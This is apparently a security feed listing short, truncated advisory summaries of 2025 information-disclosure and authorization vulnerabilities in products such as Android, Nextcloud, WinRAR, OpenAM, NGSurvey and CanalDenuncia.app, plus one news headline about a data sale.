EUVD-2025-201758

In multiple files, there is a possible way to reveal information across users due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation...

Google Android 安全漏洞

Google Android is a Linux-based open source operating system from the American company Google. Google Android suffers from a security vulnerability that stems from a lack of permission checking, which could lead to cross-user information disclosure...

CVE-2025-66510 Nextcloud Server Contacts Search allowed users to retrieve contact information of other users beyond their contact list

Nextcloud Server is a self hosted personal cloud system. In Nextcloud Server prior to 31.0.10 and 32.0.1 and Nextcloud Enterprise Server prior to 28.0.14.11, 29.0.16.8, 30.0.17.3, and 31.0.10, contacts search allowed to retrieve personal data of other users emails, names, identifiers without prop...

[SECURITY] Fedora 43 Update: kf6-kcoreaddons-6.20.0-2.fc43

KCoreAddons provides classes built on top of QtCore to perform various tasks such as manipulating mime types, autosaving files, creating backup files, generating random sequences, performing text manipulations such as macro replacement, accessing user information and many more...

Adobe Experience Manager (AEM) Sling User Information Servlet Exposure

The remote Adobe Experience Manager AEM Sling User Information Servlet is prone to information disclosure vulnerabilities. An attacker can exploit this issue to gather information about user accounts, including usernames and other details, which could be used in subsequent attacks such as...

CVE-2025-13829

Incorrect Authorization vulnerability in Data Illusion Zumbrunn NGSurvey allows any logged-in user to obtain the private information of any other user. Critical information retrieved: APIKEY 1 year user Session RefreshToken 10 minutes user Session Password hashed with bcrypt User IP Email Full Na...

Hacker Selling Alleged Samsung Medison Data Stolen In 3rd Party Breach

Hacker using the alias 888, claims to be selling Samsung Medison data taken through a third party breach, including internal files, keys and user info...

CVE-2025-12639

The WordPress plugin wModes – Catalog Mode, Product Pricing, Enquiry Forms & Promotions (WooCommerce) is affected by CVE-2025-12639. Versions up to and including 1.2.2 are vulnerable to an authorization bypass via an AJAX endpoint, enabling authenticated attackers with subscriber-level access and...

Linux Distros Unpatched Vulnerability : CVE-2025-52331

The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - Cross-site scripting XSS vulnerability in the generate report functionality in Rarlab WinRAR 7.11, allows attackers to disclose user information such as the...

CVE-2025-52331

Cross-site scripting XSS vulnerability in the generate report functionality in Rarlab WinRAR 7.11, allows attackers to disclose user information such as the computer username, generated report directory, and IP address. The generate report command includes archived file names without validation i...

OpenAM: Using arbitrary OIDC requested claims values in id_token and user_info is allowed

Summary If the "claimsparametersupported" parameter is activated, it is possible through the "oidc-claims-extension.groovy" script, to inject the value of choice into a claim contained in the idtoken or in the userinfo. Authorization function requests do not prevent a claims parameter containing ...

CVE-2025-64099 OpenAM allows use of arbitrary OIDC requested claims values in id_token and user_info

Open Access Management OpenAM is an access management solution. In versions prior to 16.0.0, if the "claimsparametersupported" parameter is activated, it is possible, thanks to the "oidc-claims-extension.groovy" script, to inject the value of one's choice into a claim contained in the idtoken or ...

CVE-2025-52331

Cross-site scripting XSS vulnerability in the generate report functionality in Rarlab WinRAR 7.11, allows attackers to disclose user information such as the computer username, generated report directory, and IP address. The generate report command includes archived file names without validation i...

UBUNTU-CVE-2025-52331

Cross-site scripting XSS vulnerability in the generate report functionality in Rarlab WinRAR 7.11, allows attackers to disclose user information such as the computer username, generated report directory, and IP address. The generate report command includes archived file names without validation i...

CVE-2025-52331

Cross-site scripting XSS vulnerability in the generate report functionality in Rarlab WinRAR 7.11, allows attackers to disclose user information such as the computer username, generated report directory, and IP address. The generate report command includes archived file names without validation i...

Rarlab WinRAR 安全漏洞

Rarlab WinRAR is a file compression/decompression software from Rarlab. A security vulnerability exists in Rarlab WinRAR version 7.11, which originates from cross-site scripting in the Generate Report function and could lead to the disclosure of user information...

CVE-2025-41343

A lack of authorisation vulnerability has been detected in CanalDenuncia.app. This vulnerability allows an attacker to access other users' information by sending a POST through the parameter 'email' in '/backend/api/users/searchUserByEmail.php'...

CVE-2025-41337

A lack of authorisation vulnerability has been detected in CanalDenuncia.app. This vulnerability allows an attacker to access other users' information by sending a POST through the parameter 'web' in '/backend/api/buscarSSOParametros.php'...

CanalDenuncia App 安全漏洞

CanalDenuncia App is a reporting channel application from the Spanish company CanalDenuncia. A security vulnerability exists in CanalDenuncia App, which stems from a lack of authorization checking, which allows an attacker to send a POST request to access other users' information via the paramete...

CVE-2025-60800

Incorrect access control in the /jshERP-boot/user/info interface of jshERP up to commit 90c411a allows attackers to access sensitive information via a crafted GET request...